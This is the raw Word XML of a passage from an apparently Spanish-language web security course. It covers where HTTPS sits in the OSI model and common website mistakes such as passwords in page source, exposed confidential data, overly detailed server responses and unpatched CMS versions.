                  <wp:posOffset>188906</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="5861685" cy="4084954"/>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685" cy="4084954"/>
                          <a:chOff x="0" y="0"/>
                          <a:chExt cx="5861685" cy="4084954"/>
                        </a:xfrm>
                      </wpg:grpSpPr>
                      <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
                        <pic:nvPicPr>
                          <pic:cNvPr id="427" name="Image 427" descr="Web services and OSI layers"/>
                          <pic:cNvPicPr/>
                        </pic:nvPicPr>
                        <pic:blipFill>
                          <a:blip r:embed="rId196" cstate="print"/>
                          <a:stretch>
                            <a:fillRect/>
                          </a:stretch>
                        </pic:blipFill>
                        <pic:spPr>
                          <a:xfrm>
                            <a:off x="0" y="0"/>
                            <a:ext cx="5861640" cy="4084533"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                        </pic:spPr>
                      </pic:pic>
                      <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
                        <pic:nvPicPr>
                          <pic:cNvPr id="428" name="Image 428" descr="Web services and OSI layers"/>
                          <pic:cNvPicPr/>
                        </pic:nvPicPr>
                        <pic:blipFill>
                          <a:blip r:embed="rId197" cstate="print"/>
                          <a:stretch>
                            <a:fillRect/>
                          </a:stretch>
                        </pic:blipFill>
                        <pic:spPr>
                          <a:xfrm>
                            <a:off x="158664" y="158602"/>
                            <a:ext cx="5364479" cy="3587496"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                        </pic:spPr>
                      </pic:pic>
                    </wpg:wgp>
                  </a:graphicData>
                </a:graphic>
              </wp:anchor>
            </w:drawing>
          </mc:Choice>
          <mc:Fallback>
            <w:pict>
              <v:group w14:anchorId="4496B718" id="Group 426" o:spid="_x0000_s1026" style="position:absolute;margin-left:250.65pt;margin-top:14.85pt;width:461.55pt;height:321.65pt;z-index:15812096;mso-wrap-distance-left:0;mso-wrap-distance-right:0;mso-position-horizontal-relative:page" coordsize="58616,4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">
                <v:shape id="Image 427" o:spid="_x0000_s1027" type="#_x0000_t75" alt="Web services and OSI layers" style="position:absolute;width:58616;height:4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">
                  <v:imagedata r:id="rId198" o:title="Web services and OSI layers"/>
                </v:shape>
                <v:shape id="Image 428" o:spid="_x0000_s1028" type="#_x0000_t75" alt="Web services and OSI layers" style="position:absolute;left:1586;top:1586;width:53645;height:3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">
                  <v:imagedata r:id="rId199" o:title="Web services and OSI layers"/>
                </v:shape>
                <w10:wrap anchorx="page"/>
              </v:group>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r w:rsidRPr="007A7B84">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t>modelo.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="010CE22E" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="001B199E">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="664DAC6A" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="001B199E">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4CDC5711" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="001B199E">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3C051672" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="001B199E">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2A3AE324" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="001B199E">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="302899BF" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="001B199E">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="209EFAAC" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="001B199E">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0E035A80" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="001B199E">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="31B394F3" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="001B199E">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="51660DCF" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="001B199E">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="532CAEBE" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="001B199E">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7438821E" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="001B199E">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="36E4A399" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="001B199E">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:spacing w:before="282"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7C64F13B" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="007F001E">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="13"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="949"/>
        </w:tabs>
        <w:spacing w:line="211" w:lineRule="auto"/>
        <w:ind w:left="949" w:right="1330" w:hanging="360"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007A7B84">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t>El cifrado entre ambos lados se realiza en la capa de presentación. Por lo tanto, HTTPS (capa de conexión segura) funciona en la capa 6.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47875DAB"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1100" w:right="0" w:bottom="580" w:left="0" w:header="0" w:footer="292" w:gutter="0"/>
          <w:cols w:space="720"/>
        </w:sectPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2F213F11" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="007F001E">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="13"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1168"/>
        </w:tabs>
        <w:spacing w:before="300" w:line="460" w:lineRule="exact"/>
        <w:ind w:left="1168" w:hanging="359"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007A7B84">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Existen múltiples vulnerabilidades o errores de configuración en el sitio web que permiten al atacante</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="297D2FC4" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="007F001E">
      <w:pPr>
        <w:spacing w:line="460" w:lineRule="exact"/>
        <w:ind w:left="1169"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007A7B84">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t>comprometer el sitio web e incluso el servidor en el que se está ejecutando.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="429E3BB5" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="001B199E">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4B656FDC" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="001B199E">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:spacing w:before="432"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0D813459" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="007F001E">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="13"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1168"/>
        </w:tabs>
        <w:ind w:left="1168" w:hanging="359"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007A7B84">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t>Entenderemos dichas vulnerabilidades y veremos cómo explotarlas.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30C2039D" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="001B199E">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1E116A3D" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="001B199E">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:spacing w:before="477"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1D257596" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="007F001E">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="13"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1169"/>
        </w:tabs>
        <w:spacing w:line="211" w:lineRule="auto"/>
        <w:ind w:left="1169" w:right="1475"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007A7B84">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t>Recuerde que un servidor web vulnerable puede ser el punto de entrada de un atacante a la red y puede utilizarse para propagar la infección comprometiendo al cliente que accede a él.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="411CC3A6" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="001B199E">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="078A8E13" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="001B199E">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:spacing w:before="447"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="69792F6A" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="007F001E">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="13"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1168"/>
        </w:tabs>
        <w:ind w:left="1168" w:hanging="359"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007A7B84">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t>Por lo tanto, es importante proteger el sitio web o la aplicación web.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="691CDE68"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292" w:gutter="0"/>
          <w:cols w:space="720"/>
        </w:sectPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="138D2103" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="007F001E">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="13"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1067"/>
        </w:tabs>
        <w:spacing w:before="56"/>
        <w:ind w:left="1067" w:hanging="359"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007A7B84">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>A veces, los errores tontos del desarrollador pueden dar lugar a escenarios desastrosos.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="283832C7" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="001B199E">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0F00C919" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="001B199E">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:spacing w:before="432"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2C2F7E87" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="007F001E">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="13"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1067"/>
        </w:tabs>
        <w:ind w:left="1067" w:hanging="359"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007A7B84">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t>Los siguientes errores son comunes:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3515CE98" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="007F001E">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="13"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1787"/>
        </w:tabs>
        <w:spacing w:before="44"/>
        <w:ind w:left="1787" w:hanging="359"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="007A7B84">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t>Contraseña</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="007A7B84">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="007A7B84">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t>encontrada</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="007A7B84">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="007A7B84">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t>involuntariamente</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="007A7B84">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="007A7B84">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t>en</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="007A7B84">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t xml:space="preserve"> la </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="007A7B84">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t>página</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="007A7B84">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t xml:space="preserve"> de </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="007A7B84">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t>origen</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="007A7B84">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t xml:space="preserve"> del sitio web.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20A376FC" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="007F001E">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="13"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1787"/>
        </w:tabs>
        <w:spacing w:before="42"/>
        <w:ind w:left="1787" w:hanging="359"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007A7B84">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t>Información confidencial dejada en páginas públicas.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A186C40" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="007F001E">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="13"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1787"/>
        </w:tabs>
        <w:spacing w:before="45"/>
        <w:ind w:left="1787" w:hanging="359"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007A7B84">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t>Proporcionar información detallada de los servidores internos a los clientes al realizar consultas.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55FDB0C2" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="001B199E">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0072F6B2" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="001B199E">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:spacing w:before="278"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="556EB393" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="007F001E">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="13"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1068"/>
        </w:tabs>
        <w:spacing w:line="211" w:lineRule="auto"/>
        <w:ind w:left="1068" w:right="868"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007A7B84">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t>Puede suceder que el CMS (servicio de gestión de contenidos) que se ejecuta en el extremo del servidor no esté parcheado y ejecute versiones anteriores.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12EBEEFD" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="001B199E">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="003C2406" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="001B199E">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:spacing w:before="447"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1E3EB1EE" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="007F001E">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="13"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1067"/>
        </w:tabs>
        <w:ind w:left="1067" w:hanging="359"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007A7B84">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t>Uno puede encontrar la versión vulnerable del CMS mediante una consulta y luego puede buscar cualquier sitio web público disponible.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="663CB055" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="001B199E">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:rPr>
